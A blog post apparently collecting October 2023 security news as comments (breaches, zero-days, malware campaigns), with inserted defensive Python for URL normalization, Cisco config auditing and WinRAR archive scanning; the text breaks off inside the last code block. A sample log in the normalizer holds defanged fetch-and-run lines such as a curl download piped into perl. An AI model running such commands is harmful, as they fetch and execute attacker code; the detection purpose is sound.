Cyber security news October 2023

This posting is here to collect cyber security news in October 2023.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

265 Comments

  1. Tomi Engdahl says:

    23andMe hit with lawsuits after hacker leaks stolen genetics data https://www.bleepingcomputer.com/news/security/23andme-hit-with-lawsuits-after-hacker-leaks-stolen-genetics-data/

    Genetic testing provider 23andMe faces multiple class action lawsuits in the U.S. following a large-scale data breach that is believed to have impacted millions of its customers.

    Late last month, a threat actor leaked 23andMe customer data in a CSV file named ‘Ashkenazi DNA Data of Celebrities.csv’ on hacker forums.

    The file allegedly contained the data of nearly 1 million Ashkenazi Jews who used 23andMe services to find their ancestry info, genetic predispositions, and more.

    Reply
  2. Tomi Engdahl says:

    Ubuntu discovers ‘hate speech’ in release 23.10 — how to upgrade?
    https://www.bleepingcomputer.com/news/security/ubuntu-discovers-hate-speech-in-release-2310-how-to-upgrade/

    Ubuntu, the most popular Linux distribution, has pulled its Desktop release 23.10 after its Ukrainian translations were discovered to contain hate speech.

    According to the Ubuntu project, a malicious contributor is behind anti-Semitic, homophobic, and xenophobic slurs that were injected into the distro via a “third party tool” that lives outside of the Ubuntu Archive.

    Reply
  3. Tomi Engdahl says:

    Women Political Leaders Summit targeted in RomCom malware phishing https://www.bleepingcomputer.com/news/security/women-political-leaders-summit-targeted-in-romcom-malware-phishing/

    A new, lightweight variant of the RomCom backdoor was deployed against participants of the Women Political Leaders (WPL) Summit in Brussels, a summit focusing on gender equality and women in politics.

    The campaign used a fake website mimicking the official WPL portal to bait people seeking to attend or simply interested in the summit.

    A Trend Micro report analyzing the new variant warns that its operators, tracked by the firm as ‘Void Rabisu,’ have been using a stealthier backdoor with a new TLS-enforcement technique in the C2 (command and control) communications to make discovery harder.

    Reply
  4. Tomi Engdahl says:

    ShellBot Cracks Linux SSH Servers, Debuts New Evasion Tactic https://www.darkreading.com/cloud/shellbot-cracks-linux-ssh-servers-debuts-new-evasion-tactic

    Cyberattackers are targeting Linux SSH servers with the ShellBot malware, and they have a new method for hiding their activity: using hexadecimal IP (Hex IP) addresses to evade behavior-based detection.

    According to researchers at the AhnLab Security Emergency Response Center (ASEC), the threat actors are translating the familiar “dot-decimal” command-and-control URL formation (i.e., hxxp://39.99.218[.]78,) into a Hex IP address format (such as hxxp://0x2763da4e/), which most URL-based detection signatures won’t parse or flag.

    “IP addresses can be expressed in formats other than the dot-decimal notation, including decimal and hexadecimal notations, and are generally compatible with widely used Web browsers,” according to the ASEC advisory on the Hex IP attacks. “Due to the usage of curl for the download and its ability to support hexadecimal just like Web browsers, ShellBot can be downloaded successfully on a Linux system environment and executed through Perl.”

    Reply
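The evasion in the ShellBot item above works because curl and browsers accept any inet_aton-style IPv4 literal (hex, decimal, octal, fewer than four components) while signatures expect dotted-decimal. The normalizer below, written here as an added defender-side example and not taken from the ASEC report or the original post, canonicalizes such hosts before matching; the hex value 0x2763da4e is the one quoted in the post, the other notations of the same address and the log lines are constructed, and "hxxp" is accepted so defanged indicators can be fed through it too.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Split a URL into scheme, host and the rest; "hxxp" is accepted for defanged indicators.
URL_PARTS_RE = re.compile(
    r"^(?P<scheme>h(?:tt|xx)ps?://)(?P<host>[^/:\s]+)(?P<rest>[:/].*)?$", re.IGNORECASE
)
# Pull candidate URLs out of free text such as shell history or process-command lines.
URL_IN_TEXT_RE = re.compile(r"h(?:tt|xx)ps?://[^\s'\"]+", re.IGNORECASE)


def _parse_component(s: str) -> Optional[int]:
    """Parse one address component the way inet_aton()/curl do:
    0x-prefixed hex, leading-zero octal, otherwise decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", s):
        return int(s, 16)
    if re.fullmatch(r"0[0-7]*", s):
        return int(s, 8)
    if re.fullmatch(r"[1-9][0-9]*", s):
        return int(s, 10)
    return None  # not a numeric component, e.g. part of a hostname


def normalize_ipv4_host(host: str) -> Optional[str]:
    """Return the dotted-decimal form of an inet_aton-style IPv4 literal
    (1 to 4 components, each hex/octal/decimal), or None if host is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_component(p) for p in parts]
    if any(v is None for v in values):
        return None
    # inet_aton semantics: each leading component is one byte; the last component
    # fills all remaining bytes, so a lone "0x2763da4e" covers all four.
    if any(v > 0xFF for v in values[:-1]):
        return None
    remaining_bits = 8 * (5 - len(values))
    if values[-1] >= 1 << remaining_bits:
        return None
    addr = 0
    for v in values[:-1]:
        addr = (addr << 8) | v
    addr = (addr << remaining_bits) | values[-1]
    return str(ipaddress.IPv4Address(addr))


def normalize_url(url: str) -> Tuple[str, bool]:
    """Rewrite an IPv4-literal host to dotted-decimal.
    Returns (normalized_url, was_obfuscated); non-IP hosts are returned unchanged."""
    m = URL_PARTS_RE.match(url)
    if not m:
        return url, False
    host = m.group("host").replace("[.]", ".")  # refang defanged indicators
    canon = normalize_ipv4_host(host)
    if canon is None:
        return url, False
    return m.group("scheme") + canon + (m.group("rest") or ""), canon != host


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_no, original_url, canonical_url) for every URL whose
    IPv4 host is written in a notation other than plain dotted-decimal."""
    hits = []
    for i, line in enumerate(lines, 1):
        for url in URL_IN_TEXT_RE.findall(line):
            canon, obfuscated = normalize_url(url)
            if obfuscated:
                hits.append((i, url, canon))
    return hits


# Constructed sample lines (not real telemetry); all four IP forms are the same address.
SAMPLE_LOG = [
    "bash: curl -s hxxp://0x2763da4e/bot.pl -o /tmp/.x && perl /tmp/.x",  # hex, as in the post
    "bash: curl -s hxxp://39.99.218[.]78/bot.pl",                          # dotted-decimal (defanged)
    "bash: wget hxxp://660855374/payload",                                 # single decimal integer
    "bash: curl hxxp://047.0143.0332.0116:8080/x",                         # octal components
    "bash: curl https://example.com/update",                               # hostname, ignored
]

if __name__ == "__main__":
    for line_no, url, canon in scan_lines(SAMPLE_LOG):
        print(f"line {line_no}: {url} -> {canon}")
```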
  5. Tomi Engdahl says:

    Signal Debunks Zero-Day Vulnerability Reports, Finds No Evidence https://thehackernews.com/2023/10/signal-debunks-zero-day-vulnerability.html

    Encrypted messaging app Signal has pushed back against “viral reports” of an alleged zero-day flaw in its software, stating it found no evidence to support the claim.

    “After responsible investigation *we have no evidence that suggests this vulnerability is real* nor has any additional info been shared via our official reporting channels,” it said in a series of messages posted in X (formerly Twitter).

    Signal said it also checked with the U.S. government and that it found no information to suggest “this is a valid claim.” It’s also urging those with legitimate information to send reports to security@signal[.]org.

    Reply
  6. Tomi Engdahl says:

    Fake ‘RedAlert’ rocket alert app for Israel installs Android spyware https://www.bleepingcomputer.com/news/security/fake-redalert-rocket-alert-app-for-israel-installs-android-spyware/

    Israeli Android users are targeted by a malicious version of the ‘RedAlert – Rocket Alerts’ app that, while it offers the promised functionality, acts as spyware in the background.

    RedAlert – Rocket Alerts is a legitimate open-source app used by Israeli citizens to receive notifications of incoming rockets targeting the country. The app is highly popular, with over a million downloads on Google Play.

    Since Hamas terrorists launched their attack in South Israel last week, involving thousands of rockets, interest in the app has exploded as people sought timely warnings about incoming airstrikes in their area.

    According to Cloudflare, hackers of unknown motivation and origin are leveraging the elevated interest in the app and the fear of the attacks to distribute a fake version that installs spyware.

    Reply
  7. Tomi Engdahl says:

    DarkGate malware spreads through compromised Skype accounts https://www.bleepingcomputer.com/news/security/darkgate-malware-spreads-through-compromised-skype-accounts/

    Between July and September, DarkGate malware attacks have used compromised Skype accounts to infect targets through messages containing VBA loader script attachments.

    According to Trend Micro security researchers who spotted the attacks, this script downloads a second-stage AutoIT script designed to drop and execute the final DarkGate malware payload.

    “Access to the victim’s Skype account allowed the actor to hijack an existing messaging thread and craft the naming convention of the files to relate to the context of the chat history,” Trend Micro said.

    “It’s unclear how the originating accounts of the instant messaging applications were compromised, however is hypothesized to be either through leaked credentials available through underground forums or the previous compromise of the parent organization,”

    Reply
  8. Tomi Engdahl says:

    CISA, FBI urge admins to patch Atlassian Confluence immediately https://www.bleepingcomputer.com/news/security/cisa-fbi-urge-admins-to-patch-atlassian-confluence-immediately/

    CISA, FBI, and MS-ISAC warned network admins today to immediately patch their Atlassian Confluence servers against a maximum severity flaw actively exploited in attacks.

    Tracked as CVE-2023-22515, this critical privilege escalation flaw affects Confluence Data Center and Server 8.0.0 and later and is remotely exploitable in low-complexity attacks that don’t require user interaction.

    Those who couldn’t upgrade were urged to shut down impacted instances or isolate them from Internet access. Admins were also advised to check for indicators of compromise, including new or suspicious admin user accounts.

    Reply
  9. Tomi Engdahl says:

    Hackers steal sensitive info of thousands of Sony employees https://www.pandasecurity.com/en/mediacenter/mobile-news/sony-employees-hack/

    Last month, a cyber group linked to a Russian-speaking CL0P cyber gang said they managed to hack the Japanese multinational conglomerate and were looking to give the stolen materials to the highest bidder on the dark web.

    The group stated they tried to ask for ransom, but Sony refused to cooperate, so the hackers were looking at other ways to monetize. The fraudsters published multiple materials confirming the stolen data was genuine, but whether they managed to sell it on the dark web remains unknown.

    Reply
  10. Tomi Engdahl says:

    Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure https://thehackernews.com/2023/10/discord-playground-for-nation-state.html

    In what’s the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray in leveraging the social platform for targeting critical infrastructure.

    Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.

    “The usage of Discord is largely limited to information stealers and grabbers that anyone can buy or download from the Internet,” Trellix researchers Ernesto Fernández Provecho and David Pastor Sanz said in a Monday report.

    But that may be changing, for the cybersecurity firm said it found evidence of an artifact targeting Ukrainian critical infrastructures. There is currently no evidence linking it to a known threat group.

    “The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape,” the researchers noted.

    Reply
  11. Tomi Engdahl says:

    CERT-UA Reports: 11 Ukrainian Telecom Providers Hit by Cyberattacks https://thehackernews.com/2023/10/cert-ua-reports-11-ukrainian-telecom.html

    The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that threat actors “interfered” with at least 11 telecommunication service providers in the country between May and September 2023.

    The agency is tracking the activity under the name UAC-0165, stating the intrusions led to service interruptions for customers.

    The starting point of the attacks is a reconnaissance phase in which a telecom company’s network is scanned to identify exposed RDP or SSH interfaces and potential entry points.

    “It should be noted that reconnaissance and exploitation activities are carried out from previously compromised servers located, in particular, in the Ukrainian segment of the internet,” CERT-UA said.

    Reply
  12. Tomi Engdahl says:

    Thousands of Cisco IOS XE devices hacked in widespread attacks https://www.bleepingcomputer.com/news/security/thousands-of-cisco-ios-xe-devices-hacked-in-widespread-attacks/

    Attackers have exploited a recently disclosed critical zero-day bug to compromise and infect thousands of Cisco IOS XE devices with malicious implants.

    According to threat intelligence company VulnCheck, the maximum severity vulnerability (CVE-2023-20198) has been extensively exploited in attacks targeting Cisco IOS XE routers and switches with the Web User Interface (Web UI) feature enabled, that also have the HTTP or HTTPS Server feature toggled on.

    VulnCheck scanned internet-facing Cisco IOS XE web interfaces and discovered thousands of compromised and infected hosts. The company has also released a scanner to detect these implants on affected devices.

    Reply
  13. Tomi Engdahl says:

    Fraudsters target Booking.com customers claiming hotel stay could be cancelled https://grahamcluley.com/fraudsters-target-booking-com-customers-claiming-hotel-stay-could-be-cancelled/

    One of the world’s largest online travel agencies, Booking.com, is being used by fraudsters to trick hotel guests into handing over their payment card details.

    The online booking went smoothly as you would expect. But on Friday, two weeks after I made the original booking, I received a notification from the Booking.com smartphone app that I had a new message from the hotel I was planning to stay at.

    I looked in the app, and sure enough I had a message from the “hotel”, straight after a legitimate message from the hotel. It also appears on the website version of Booking.com.

    Reply
  14. Tomi Engdahl says:

    The forgotten malvertising campaign
    https://www.malwarebytes.com/blog/threat-intelligence/2023/10/the-forgotten-malvertising-campaign

    In recent weeks, we have noted an increase in malvertising campaigns via Google searches. Several of the threat actors we are tracking have improved their techniques to evade detection throughout the delivery chain.

    We believe this evolution will have a real world impact among corporate users getting compromised via malicious ads eventually leading to the deployment of malware and ransomware.

    In this blog post, we look at a malvertising campaign that seems to have flown under the radar entirely for at least several months. It is unique in its way to fingerprint users and distribute time sensitive payloads.

    Reply
  15. Tomi Engdahl says:

    Network Security
    ‘HTTP/2 Rapid Reset’ Zero-Day Exploited to Launch Largest DDoS Attacks in History
    https://www.securityweek.com/rapid-reset-zero-day-exploited-to-launch-largest-ddos-attacks-in-history/

    A zero-day vulnerability named HTTP/2 Rapid Reset has been exploited to launch some of the largest DDoS attacks in history.

    Reply
  16. Tomi Engdahl says:

    ICS/OT
    Critical Vulnerabilities Expose ​​Weintek HMIs to Attacks
    https://www.securityweek.com/critical-vulnerabilities-expose-weintek-hmis-to-attacks/

    Weintek has patched critical and high-severity vulnerabilities found in its cMT series HMIs by industrial cybersecurity firm TXOne.

    Reply
  17. Tomi Engdahl says:

    US Gov Expects Widespread Exploitation of Atlassian Confluence Vulnerability
    https://www.securityweek.com/us-gov-expects-widespread-exploitation-of-atlassian-confluence-vulnerability/

    CISA, FBI, and MS-ISAC warn of potential widespread exploitation of CVE-2023-22515, a critical vulnerability in Atlassian Confluence.

    US cybersecurity agency CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) warn organizations of potential widespread exploitation of a recent zero-day vulnerability in Atlassian Confluence Data Center and Server.

    Tracked as CVE-2023-22515 (CVSS score of 9.8), the bug has been exploited by a nation-state threat actor since September 14, roughly two weeks before Atlassian released patches for it.

    Remotely exploitable without authentication, the flaw is described as a broken access control issue leading to privilege escalation. The issue impacts on-premises Confluence instances only.

    “This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts,” CISA, FBI, and MS-ISAC note in an advisory (PDF).

    Reply
  18. Tomi Engdahl says:

    WordPress Websites Hacked via Royal Elementor Plugin Zero-Day
    https://www.securityweek.com/wordpress-websites-hacked-via-royal-elementor-plugin-zero-day/

    A critical vulnerability in the Royal Elementor WordPress plugin has been exploited as a zero-day since August 30.

    Security researchers are warning of a critical-severity vulnerability in the Royal Elementor Addons and Templates WordPress plugin that has been exploited as a zero-day for more than a month.

    Developed by WP Royal, the plugin helps domain admins build their websites without any coding experience. Royal Elementor has more than 200,000 active installations on the WordPress marketplace.

    The exploited bug, tracked as CVE-2023-5360 (CVSS score of 9.8), is described as an insufficient file type validation in the plugin’s upload function, allowing unauthenticated attackers to upload arbitrary files to vulnerable sites, leading to remote code execution.

    The flaw impacts all Royal Elementor versions prior to 1.3.79 and, according to WordPress security firm Defiant, has been exploited in malicious attacks since at least August 30.

    Reply
  19. Tomi Engdahl says:

    ICS/OT
    Milesight Industrial Router Vulnerability Possibly Exploited in Attacks
    https://www.securityweek.com/milesight-industrial-router-vulnerability-possibly-exploited-in-attacks/

    A vulnerability affecting Milesight industrial routers, tracked as CVE-2023-43261, may have been exploited in attacks.

    A vulnerability affecting some industrial routers made by Chinese IoT and video surveillance product maker Milesight may have been exploited in attacks, according to exploit and vulnerability intelligence firm VulnCheck.

    Several UR-series industrial cellular routers from Milesight (Ursalink) are affected by CVE-2023-43261, a serious vulnerability exposing system log files, such as ‘httpd.log’.

    The exposed logs contain passwords for administrators and other users, which can be leveraged by remote, unauthenticated attackers to gain unauthorized access to the targeted device. The passwords are not stored in plain text in the log files, but they can be easily cracked.

    Researcher Bipin Jitiya recently disclosed details of the vulnerability and made public a proof-of-concept (PoC) exploit. He informed Milesight about his findings, but the vendor said it had been aware of the flaw and released patches before the researcher reached out.

    https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-43261

    Inside the Router: How I Accessed Industrial Routers and Reported the Flaws
    Router Vulnerability Hunt, From Google Dorks to Firmware Emulation — The Full Story
    https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf

    CVE-2023-43261 – PoC
    Critical Vulnerability Exposes Sensitive Information and Enables Unauthorized Access in Milesight Routers
    https://github.com/win3zz/CVE-2023-43261

    Affected Products: UR5X, UR32L, UR32, UR35, UR41 and there might be other Industrial Cellular Routers that could also be vulnerable.
    Affected Firmware: I’ve confirmed the patch for firmware v35.3.0.7. Earlier versions may be vulnerable, but vendor confirmation is needed. I have made the request, but I have not received a response yet.

    Reply
  20. Tomi Engdahl says:

    Vastaamo case goes to trial: the massive list of charges includes 21,316 counts of attempted aggravated extortion
    https://www.kauppalehti.fi/uutiset/vastaamo-jutun-kasittely-alkaa-valtavalla-syytteiden-listalla-21316-torkean-kiristyksen-yritysta/99039def-82b8-4c5a-a6af-310f44957c40

    The court proceedings in the so-called Vastaamo case have begun.

    The prosecutor has charged Aleksanteri Kivimäki, who is being held in custody, with aggravated data breach, attempted aggravated extortion, 9,598 counts of aggravated dissemination of information violating personal privacy, 21,316 counts of attempted aggravated extortion and 20 counts of aggravated extortion.

    In the data breach at the psychotherapy centre Vastaamo, the data of tens of thousands of Finns was leaked and made available on the internet. The data was also used to commit further crimes. The breach came to light in October 2020.

    Reply
  21. Tomi Engdahl says:

    Recently patched Citrix NetScaler bug exploited as zero-day since August https://www.bleepingcomputer.com/news/security/recently-patched-citrix-netscaler-bug-exploited-as-zero-day-since-august/

    A critical vulnerability tracked as CVE-2023-4966 in Citrix NetScaler ADC/Gateway devices has been actively exploited as a zero-day since late August, security researchers announced.

    The security issue is an information disclosure and received a fix last week. It allows attackers to access secrets in appliances configured as gateways of authentication, authorization, and accounting (AAA) virtual servers.

    In a security bulletin on October 10 with few technical details, Citrix strongly urged customers to install the available update without delay.

    A report from Mandiant disclosed that it found signs of CVE-2023-4966 being exploited in the wild since August for stealing authentication sessions and hijacking accounts.

    Reply
  22. Tomi Engdahl says:

    BlackCat Climbs the Summit With a New Tactic https://unit42.paloaltonetworks.com/blackcat-ransomware-releases-new-utility-munchkin/

    BlackCat operators recently announced new updates to their tooling, including a utility called Munchkin that allows attackers to propagate the BlackCat payload to remote machines and shares on a victim organization network. For the past two years, the BlackCat ransomware operators have continued to evolve and iterate their tooling as part of their ransomware-as-a-service (RaaS) business model.

    As part of a recent investigation, Unit 42 researchers have acquired an instance of Munchkin that is unique, in that it is loaded in a customized Alpine virtual machine (VM). This new tactic of leveraging a customized VM to deploy malware has been gaining traction in recent months, allowing ransomware threat actors to use VMs to circumvent security solutions in deploying their malware payloads.

    This publication details how this new utility works and sheds further light on the continued tactics used by BlackCat threat actors. In doing so, it is our sincere hope to motivate further effort by the information security industry to better defend against this evolving threat.

    Reply
  23. Tomi Engdahl says:

    The Fake Browser Update Scam Gets a Makeover https://krebsonsecurity.com/2023/10/the-fake-browser-update-scam-gets-a-makeover/

    One of the oldest malware tricks in the book — hacked websites claiming visitors need to update their Web browser before they can view any content — has roared back to life in the past few months. New research shows the attackers behind one such scheme have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement: By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain.

    Reply
  24. Tomi Engdahl says:

    Google Play Protect adds real-time scanning to fight Android malware https://www.bleepingcomputer.com/news/security/google-play-protect-adds-real-time-scanning-to-fight-android-malware/

    Google has announced new, real-time scanning features for Google Play Protect that make it harder for malicious apps employing polymorphism to evade detection.

    This represents a significant step toward enhancing safety for all Android users and aims to decrease malware infections on the platform.

    Reply
  25. Tomi Engdahl says:

    Cybercrime
    Three Months After Patch, Gov-Backed Actors Exploiting WinRAR Flaw
    https://www.securityweek.com/three-months-after-patch-gov-backed-actors-exploiting-winrar-flaw/

    Google says it is still catching government-backed groups linked to China and Russia launching WinRAR exploits in targeted attacks.

    Reply
  26. Tomi Engdahl says:

    Vulnerabilities
    Recent NetScaler Vulnerability Exploited as Zero-Day Since August
    https://www.securityweek.com/recent-netscaler-vulnerability-exploited-as-zero-day-since-august/

    Mandiant says the recently patched Citrix NetScaler vulnerability CVE-2023-4966 had been exploited as zero-day since August.

    A recently patched critical-severity vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway had been exploited as a zero-day since August, Google’s Mandiant cybersecurity unit reports.

    The issue, tracked as CVE-2023-4966 (CVSS score of 9.4), can be exploited without authentication to leak sensitive information from on-prem appliances that are configured as a Gateway or an AAA virtual server.

    Citrix announced patches for this and a high-severity vulnerability in NetScaler ADC and Gateway on October 10, but made no mention of potential exploitation.

    On Tuesday, however, the tech giant updated its advisory to warn customers of observed in-the-wild exploitation of CVE-2023-4966 and urge them to update their instances as soon as possible.

    The flaw was addressed in NetScaler ADC and NetScaler Gateway versions 14.1-8.50, 13.1-49.15, and 13.0-92.19, and in NetScaler ADC versions 13.1-FIPS 13.1-37.164, 12.1-FIPS 12.1-55.300, and 12.1-NDcPP 12.1-55.300.

    Reply
  27. Tomi Engdahl says:

    Malware & Threats
    Tens of Thousands of Cisco Devices Hacked via Zero-Day Vulnerability
    https://www.securityweek.com/tens-of-thousands-of-cisco-devices-hacked-via-zero-day-vulnerability/

    Tens of thousands of Cisco devices have reportedly been hacked via the exploitation of the zero-day vulnerability CVE-2023-20198.

    Tens of thousands of Cisco devices have reportedly been hacked through the exploitation of the newly disclosed IOS XE zero-day vulnerability tracked as CVE-2023-20198.

    Cisco warned customers on Monday that a critical IOS XE zero-day has been exploited by threat actors to gain elevated privileges on devices. The company is working on a patch and in the meantime it has urged customers to implement mitigations.

    The vulnerability impacts the IOS XE web user interface, which is delivered with the default image, and it allows a remote, unauthenticated attacker to add level 15 access accounts that provide complete control over the targeted system.

    Cisco said it had seen two activity clusters involving exploitation of the vulnerability: one that started in mid-September and one that began in mid-October. Both operations are believed to have been carried out by the same threat actor, which initially tested its code and then started delivering an implant that enabled it to execute arbitrary commands at system or IOS level.

    In some cases, the hackers delivered the implant by exploiting an older IOS XE vulnerability tracked as CVE-2021-1435, but the malware was also observed on devices that have been patched against CVE-2021-1435 and the delivery mechanism remains unknown.

    Vulnerabilities
    Cisco Devices Hacked via IOS XE Zero-Day Vulnerability
    https://www.securityweek.com/cisco-devices-hacked-via-ios-xe-zero-day-vulnerability/

    Cisco is warning customers that a new IOS XE zero-day vulnerability tracked as CVE-2023-20198 is being exploited to hack devices.

    Cisco is warning customers that a new zero-day vulnerability impacting the company’s IOS XE software is being exploited to hack devices.

    The critical vulnerability is tracked as CVE-2023-20198 and it has been described as a privilege escalation issue impacting the IOS XE web user interface, which comes with the default image. A remote, unauthenticated attacker can exploit the vulnerability to create an account that has the highest privileges — level 15 access — and use it to take control of the device.

    Reply
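The Cisco IOS XE items above (comments 12 and 27) name two things a defender can audit from a running-config: whether the web UI is reachable because the HTTP or HTTPS server feature is on, and whether local accounts with level 15 privilege exist that nobody provisioned. The check below is an added example, not code from Cisco, VulnCheck or the original post; the config excerpt, hostnames and user names are constructed, and the `$9$PLACEHOLDER` values stand in for real secret hashes.

```python
import re
from typing import Dict, List, Set

# Constructed running-config excerpt (not from the page or from Cisco): web UI served over
# HTTP and HTTPS, plus a privilege-15 local user that is not in the known-admin baseline.
SAMPLE_RUNNING_CONFIG = """\
!
hostname edge-rtr-01
!
username netadmin privilege 15 secret 9 $9$PLACEHOLDER
username svc_backup privilege 15 secret 9 $9$PLACEHOLDER
username monitor privilege 1 secret 9 $9$PLACEHOLDER
!
ip http server
ip http secure-server
!
end
"""

# "username <name> [privilege <n>] ..." lines; privilege is optional in IOS syntax.
USERNAME_RE = re.compile(r"^username\s+(\S+)(?:\s+privilege\s+(\d+))?", re.MULTILINE)


def web_ui_exposure(config: str) -> Dict[str, bool]:
    """Report whether the IOS XE HTTP and/or HTTPS server (the web UI transport) is on.
    Later lines override earlier ones, as in a running-config."""
    enabled = {"http": False, "https": False}
    for raw in config.splitlines():
        line = " ".join(raw.split())  # collapse stray whitespace
        if line == "ip http server":
            enabled["http"] = True
        elif line == "no ip http server":
            enabled["http"] = False
        elif line == "ip http secure-server":
            enabled["https"] = True
        elif line == "no ip http secure-server":
            enabled["https"] = False
    return enabled


def privilege15_users(config: str) -> List[str]:
    """Local usernames configured with privilege 15 (full control), in config order."""
    return [
        m.group(1)
        for m in USERNAME_RE.finditer(config)
        if m.group(2) is not None and int(m.group(2)) == 15
    ]


def audit(config: str, baseline_admins: Set[str]) -> List[str]:
    """Findings: exposed web UI transports and privilege-15 users absent from the baseline.
    An empty list means neither condition was found."""
    findings: List[str] = []
    exposed = [name for name, on in web_ui_exposure(config).items() if on]
    if exposed:
        findings.append("web UI transport enabled: " + ", ".join(exposed))
    for user in privilege15_users(config):
        if user not in baseline_admins:
            findings.append(f"unexpected privilege 15 user: {user}")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_RUNNING_CONFIG, {"netadmin"}):
        print(finding)
```

A finding of an unexpected privilege 15 user is a trigger for the vendor's own implant checks and a configuration review, not proof of compromise on its own.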
  28. Tomi Engdahl says:

    Joseph Cox / 404 Media:
    Experts say misinformation from “verified” pseudo-OSINT accounts on X, driven by profit and engagement, is destroying the Israel-Hamas war information ecosystem

    ‘Verified’ OSINT Accounts Are Destroying the Israel-Palestine Information Ecosystem
    https://www.404media.co/twitter-verified-osint-accounts-are-destroying-the-israel-palestine-information-ecosystem/

    The problem with profit and engagement driven misinformation from pseudo-OSINT accounts during the Israel-Palestine conflict is “unprecedented.” One expert said after Musk’s recent changes “all hell broke loose.”

    Shortly after Russia invaded Ukraine in February 2022, many people across the world were first introduced to the term “OSINT,” which stands for open source intelligence. The practice of using photographs posted to social media, free-to-access satellite images, and other readily available sources of information to confirm where, how, and when important world events took place has existed for many years, but has been popularized during the biggest conflicts as more people signed up to social networks, which allowed anyone with an internet connection to participate in or consume it.

    OSINT’s appeal is obvious. Rather than relying on government sources and narratives, and with new access to information on the internet, outside organizations or experts could attempt to confirm or deny those claims for themselves. Early on in Russia’s invasion, for example, Bellingcat, a non-profit organization that uses OSINT in many of its investigations, showed that Russia used cluster munitions in urban areas which resulted in civilian deaths. Bellingcat is known for its rigorous approach to OSINT and has repeatedly used OSINT techniques to break news on important global crises including the downing of Malaysian Airlines flight 17, the Syrian Civil War, the Christchurch shooting, and the January 6 insurrection.

    OSINT is a useful way to try and verify claims, and 404 Media sometimes uses it in the course of its reporting. One of the reasons OSINT is so popular is because it is accessible to anyone, though experienced groups often use more sophisticated techniques than others. Major newsrooms have increasingly hired people specifically for their own OSINT teams. But what the current war in Israel and Gaza has made clear in recent days is that there are many verified, popular accounts on Twitter that use the OSINT term to give legitimacy to shoddy work that only creates more confusion. What exists now is a profit and engagement driven ecosystem of non-experts who in some cases may be spreading videos for the clout and cash, rather than to inform readers about what is actually true. One respected OSINT expert, known as Obretix, told 404 Media that Twitter now is “self promoting aggregators, posting thousands of tweets to get some revenue share from Elon.”

    And everyone stands to lose when the quality of information on Twitter makes it harder for ordinary readers, or even some experts, to understand what is true and what is not. Paweł Wójcik, who has been an analyst on Twitter for years with a particular focus on terrorist groups such as Al Qaeda and the Islamic State, told 404 Media in an online chat that “there has always been misinformation and fakes, however for people who have been observing wars on this platform for over a decade, today’s problem is unprecedented.”

    Today, Twitter is a very different space. Wójcik pointed to Elon Musk’s various changes around revoking bans of previously suspended users, the “mass overcrowding” of verified users (people are able to simply pay for a blue check now), and Musk’s introduced “incentives to spread misinformation in order to get paid for views.” One of Twitter’s changes, rolled out in June, is that people who pay to be verified on the site can now generate revenue based on the engagement they receive from other paying, verified users. After these, Wójcik said “all hell broke loose.”

    Searching Twitter for “OSINT” yields hundreds of users with “OSINT” in their username or bio. It can be exceptionally difficult at first glance to tell who is an expert and who is not.

    Within Twitter’s current profit and engagement focused ecosystem, the weapons specialist and OSINT expert known as Calibre Obscura generalized that “this entire space is 90% grifters.” The reason: “profit and the dopamine of likes and follows.” Calibre Obscura did also criticize mainstream outlets, but for another reason: the rush to get the story.

    At the moment, many of these newer accounts consist of people reposting material taken from Telegram, Calibre Obscura added. Telegram has been a direct funnel for on-the-ground material in both Israel and Gaza. But when people then lift that material and post it to Twitter, it is “usually without context and usually with their own bias inserted,” Calibre Obscura told 404 Media.

    Given their specialism on firearms, Calibre Obscura said they have seen bad OSINT on weapons specifically. “Claims that Ukraine supplied weapons to Hamas (lie) or that Wagner somehow helped Hamas (lie). It’s barely OSINT, it’s more like just lies to see what fits,” they said.

    “It just creates more noise and less signal,” they said. “We need more actual journalism, verified information and less rumor mill. That’s where I see my role and other OSINTers like Bellingcat.”

    Reply
  29. Tomi Engdahl says:

    Carly Page / TechCrunch:
    Google says that government-backed hackers linked to Russia and China are exploiting a since-patched zero-day in WinRAR, discovered by Group-IB in August 2023 — Google security researchers say they have found evidence that government-backed hackers linked to Russia and China are exploiting …

    Russia and China-backed hackers are exploiting WinRAR zero-day bug
    https://techcrunch.com/2023/10/18/russia-sandworm-fancy-bear-china-winrar-zero-day/

    Google security researchers say they have found evidence that government-backed hackers linked to Russia and China are exploiting a since-patched vulnerability in WinRAR, the popular shareware archiving tool for Windows.

    The WinRAR vulnerability, first discovered by cybersecurity company Group-IB earlier this year and tracked as CVE-2023-38831, allows attackers to hide malicious scripts in archive files that masquerade as seemingly innocuous images or text documents. Group-IB said the flaw was exploited as a zero-day — since the developer had zero time to fix the bug before it was exploited — as far back as April to compromise the devices of at least 130 traders.

    Reply
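The TechCrunch summary above describes CVE-2023-38831 only at the level of “malicious scripts in archive files that masquerade as innocuous images or text documents.” The following is an added defensive example, not code from the article or from any vendor: a small heuristic scanner that flags ZIP archives in which a document- or image-looking top-level file shares its name with a directory holding a script or executable, and separately flags entry names with trailing whitespace. The archive layout it looks for follows the public advisories for that CVE rather than this page, and the two archives it builds are constructed in memory with harmless placeholder contents.

```python
"""Heuristic scanner for archives laid out like the CVE-2023-38831 decoy pattern.

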